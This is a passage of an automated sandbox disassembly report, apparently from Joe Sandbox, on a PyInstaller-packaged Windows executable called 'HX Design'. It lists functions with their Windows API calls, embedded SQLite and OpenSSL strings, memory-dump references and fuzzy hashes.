GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068AE6
CreateProcessW.KERNEL32 ref: 00007FF732068B1E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068B28

Part of subcall function 00007FF732062C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062C9E
Part of subcall function 00007FF732062C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062D63
Part of subcall function 00007FF732062C50: MessageBoxW.USER32 ref: 00007FF732062D99

RegisterClassW.USER32 ref: 00007FF732068B80
GetLastError.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068B8B
CreateWindowExW.USER32 ref: 00007FF732068BD5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068BE7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068C02
GetLastError.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068C15
PeekMessageW.USER32 ref: 00007FF732068C39
TranslateMessage.USER32 ref: 00007FF732068C47
DispatchMessageW.USER32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068C51
PeekMessageW.USER32 ref: 00007FF732068C6C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068C7E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068C99
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068CAF
GetLastError.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068CB9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068CC7
DestroyWindow.USER32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068E04
GetExitCodeProcess.KERNEL32 ref: 00007FF732068E19
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068E22
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF732063F7F), ref: 00007FF732068E2F

Strings

PyInstallerOnefileHiddenWindow, xrefs: 00007FF732068B54
PyInstaller Onefile Hidden Window, xrefs: 00007FF732068B95
Failed to create child process!, xrefs: 00007FF732068B30
CreateProcessW, xrefs: 00007FF732068B37

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction ID: 0f3fcc71c99d91d152d4c9e453354d3c2ea977a92c1cc27beb717180c93d1ef3
Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction Fuzzy Hash: C2D18431B08B82A6EB10AF74E8942BAB760FF84B58F800235DA5D47AA5DF7CD14DD714

Function 00007FFDFB3A42B0 Relevance: 23.2, APIs: 1, Strings: 12, Instructions: 452COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB3A4834

Strings

%s mode not allowed: %s, xrefs: 00007FFDFB3A47EE
mode, xrefs: 00007FFDFB3A4791
no such %s mode: %s, xrefs: 00007FFDFB3A475E
cach, xrefs: 00007FFDFB3A461F
mode, xrefs: 00007FFDFB3A460E
access, xrefs: 00007FFDFB3A46F5
file, xrefs: 00007FFDFB3A432B
invalid uri authority: %.*s, xrefs: 00007FFDFB3A4437
localhos, xrefs: 00007FFDFB3A440E
no such vfs: %s, xrefs: 00007FFDFB3A48E4
cach, xrefs: 00007FFDFB3A47B0
cache, xrefs: 00007FFDFB3A46CB

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
API String ID: 4225454184-1067337024
Opcode ID: 5f15b9148e8d691bade7ac4299c338194b5adc1f0a67d16e58ed18eaea73a7c4
Instruction ID: ccb9ae218590dd4b99ae896eed11a5177d537e398f360437ca77ffe0f8c81baf
Opcode Fuzzy Hash: 5f15b9148e8d691bade7ac4299c338194b5adc1f0a67d16e58ed18eaea73a7c4
Instruction Fuzzy Hash: 48023A6AF4E28347FF65BB149030B7967D8AB51B54F264231CA7E4B6E9DE3DE4018300

Function 00007FFDFB35CF30 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 441COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB35D5A7

Strings

8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB35CF95
%s at line %d of [%.10s], xrefs: 00007FFDFB35CFAE
API call with %s database connection pointer, xrefs: 00007FFDFB35CF84
misuse, xrefs: 00007FFDFB35CFA2
NULL, xrefs: 00007FFDFB35CF5D
unopened, xrefs: 00007FFDFB35CF7D
invalid, xrefs: 00007FFDFB35CF72

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
API String ID: 4225454184-509082904
Opcode ID: 538738bbbe174b4041f7e4fb91b9d91a4f947089070179a65c1fdba571175988
Instruction ID: 8a66ef2f6b80b9202435378c16568c63210f8783a2092bf37a77361435811080
Opcode Fuzzy Hash: 538738bbbe174b4041f7e4fb91b9d91a4f947089070179a65c1fdba571175988
Instruction Fuzzy Hash: 10126922B4AA4786EB55AB21A560F7967E1FB84B88F584031DE6E476F8DF3CF4458300

Function 00007FFDFACE3248 Relevance: 13.6, APIs: 9, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFDFACE3264
00007FFE1A461A90.VCRUNTIME140 ref: 00007FFDFACE3288
RtlCaptureContext.KERNEL32 ref: 00007FFDFACE3291
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDFACE32AB
RtlVirtualUnwind.KERNEL32 ref: 00007FFDFACE32EC
00007FFE1A461A90.VCRUNTIME140 ref: 00007FFDFACE331F
IsDebuggerPresent.KERNEL32 ref: 00007FFDFACE3340
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDFACE335D
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDFACE3368

Memory Dump Source

Source File: 00000001.00000002.2104253662.00007FFDFACE1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDFACE0000, based on PE: true

Associated: 00000001.00000002.2104206646.00007FFDFACE0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD2A000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD38000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD87000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD8C000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD8F000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104600723.00007FFDFAD90000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104654670.00007FFDFAD92000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdface0000_HX Design.jbxd

Similarity

API ID: 00007A461ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 2528831389-0
Opcode ID: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
Instruction ID: a86ee8f7fac8b57428dce5e7e9d0df6d57beedba53dcee82b3f2b296071a7a67
Opcode Fuzzy Hash: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
Instruction Fuzzy Hash: DE315E7A718B8186EB648F60E8907ED7364FB84744F00407ADA9E47B99DF38DA88C714

Function 00007FF7320683C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF73206842B
RemoveDirectoryW.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684AE
DeleteFileW.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684CD
FindNextFileW.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684DB
FindClose.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684EC
RemoveDirectoryW.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684F5

Strings

%s\*, xrefs: 00007FF7320683F2

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction ID: 692f105b74414b0cf88b93048db4bf81d73cd91066cfb5e7541dae3b84839ba2
Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction Fuzzy Hash: 33416221B0C542A5EE20BB64F4841BAA3A0FF94754FC00232EA9D83AD4EFBCD54DD764

Function 00007FFDFB2E7336 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 332COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00007FFDFB2E746E
-x0, xrefs: 00007FFDFB2E7606
VUUU, xrefs: 00007FFDFB2E759B
0123456789ABCDEF0123456789abcdef, xrefs: 00007FFDFB2E7529

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID:
String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
API String ID: 0-2031831958
Opcode ID: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
Instruction ID: 746f0727592bb5783a42fd8abebf88d4ced5f086d0a2efd7875ed288a7654f7a
Opcode Fuzzy Hash: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
Instruction Fuzzy Hash: 2AD13562B1E68386EB648B16D064F7D7BA5FB54784F4A4034DEAE877E9DE2CE400C700

Function 00007FFE0031212B Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFE0038F3A0
RtlCaptureContext.KERNEL32 ref: 00007FFE0038F3CD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE0038F3E7
RtlVirtualUnwind.KERNEL32 ref: 00007FFE0038F428
IsDebuggerPresent.KERNEL32 ref: 00007FFE0038F47C
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE0038F499
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE0038F4A4

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
Instruction ID: b2b9a384e574dc6d01f984c7e87f74cc55a0678ec92fea6ffd2636618f7f6411
Opcode Fuzzy Hash: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
Instruction Fuzzy Hash: E2310876609B819AEBA1CF61E8407EE6360FB88744F44403ADB4E47BA9DF3CD648C710

Function 00007FF73206D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF73206D148
RtlCaptureContext.KERNEL32 ref: 00007FF73206D175
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF73206D18F
RtlVirtualUnwind.KERNEL32 ref: 00007FF73206D1D0
IsDebuggerPresent.KERNEL32 ref: 00007FF73206D224
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF73206D241
UnhandledExceptionFilter.KERNEL32 ref: 00007FF73206D24C

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction ID: 1ea5c8afbb47ba66bbf64b609c14576a7989d3710ea74ba72c908db5bd70bf6f
Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction Fuzzy Hash: DD315E72708B8596EB609F60E8803EEB360FB88704F84403ADA5E57B95DFBCD548D724

Function 00007FFDFB364C70 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 370COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB364EFD
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB364FAE

Strings

out of memory, xrefs: 00007FFDFB364D5F
database schema is locked: %s, xrefs: 00007FFDFB364E56
statement too long, xrefs: 00007FFDFB364EB3

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 4225454184-1046679716
Opcode ID: bcec233128a6adfefd10faecb298d26b31b29af4ba3b25e346ab80f8a0dd3f1a
Instruction ID: d339442dcec7a0d2e3ecaf6683aabbce527f1bda9f04ca2594407e24354c3cb4
Opcode Fuzzy Hash: bcec233128a6adfefd10faecb298d26b31b29af4ba3b25e346ab80f8a0dd3f1a
Instruction Fuzzy Hash: E5F1A322F4A6878AEB25AF25D420FBA6BE2FB45748F054135DA6D077E9CF7CE5408300

Function 00007FF73207A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF73207A68D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF73207A6A5
RtlVirtualUnwind.KERNEL32 ref: 00007FF73207A6E0
IsDebuggerPresent.KERNEL32 ref: 00007FF73207A719
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF73207A723
UnhandledExceptionFilter.KERNEL32 ref: 00007FF73207A72E

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction ID: 0f2ad1ecd311a0099d341dd3c5df9fd245612e76300dbd6449f156101301a07f
Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction Fuzzy Hash: CE31B636608F8196DB60EF24E8402BEB3A4FB88754F900135EA9D43B65DF7CC149DB10

Function 00007FFE00311CBC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 292COMMON

Download Yara Rule

Strings

..\s\ssl\statem\statem_srvr.c, xrefs: 00007FFE00386DD9, 00007FFE00386E8A, 00007FFE00386FA3, 00007FFE00386FC3, 00007FFE00387015, 00007FFE0038708F, 00007FFE00387167
resumption, xrefs: 00007FFE00386EC3
tls_construct_new_session_ticket, xrefs: 00007FFE00386DCD, 00007FFE00386E7E, 00007FFE00387009, 00007FFE00387083
construct_stateful_ticket, xrefs: 00007FFE0038715B

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID:
String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
API String ID: 0-1194634662
Opcode ID: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
Instruction ID: 8ea95384600ee31b047f961e33b0576a27c558876a72b31e38492b3a75130b95
Opcode Fuzzy Hash: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
Instruction Fuzzy Hash: DBD17C21B0D78281EB52DB66E8407ED6791EB85B84F184076EF4D4BBAECE7CE541C710

Function 00007FF732081874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7320818C0
FindFirstFileExW.KERNEL32 ref: 00007FF7320819CA

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
Instruction ID: 87bed1b45409a0ddc2972ac7848513cb50c134a8efad4fbc837271cc7f11f1ae
Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
Instruction Fuzzy Hash: 0CB1E422B1869291EA60BB25D4001BBE3A1EF44FE4F845131EE5D57BC5EFBCE449E320

Function 00007FFE00311EE2 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 470COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFE0036CCF4

Strings

..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FFE0036CB37, 00007FFE0036CE86, 00007FFE0036CED4, 00007FFE0036D002, 00007FFE0036D0DD, 00007FFE0036D13C
D:\a\1\s\include\internal/packet.h, xrefs: 00007FFE0036CAE9, 00007FFE0036CAFD
tls_parse_ctos_psk, xrefs: 00007FFE0036CE7A, 00007FFE0036CECD, 00007FFE0036CFFB, 00007FFE0036D0D6, 00007FFE0036D135

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
API String ID: 3568877910-3130753023
Opcode ID: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
Instruction ID: e19fa2dad86a98ba56c750ec7cb47ac3e737e105fcfd6182d01f674729eaf560
Opcode Fuzzy Hash: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
Instruction Fuzzy Hash: 4C12BE62B18B8381FB129B65D4442BEA7A1FF85B84F449032DF8D47BAEDE7CE5418740

Function 00007FFDFB2FC380 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 377COMMON

Download Yara Rule

Strings

recovered %d frames from WAL file %s, xrefs: 00007FFDFB2FC8D8
, xrefs: 00007FFDFB2FC40F

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
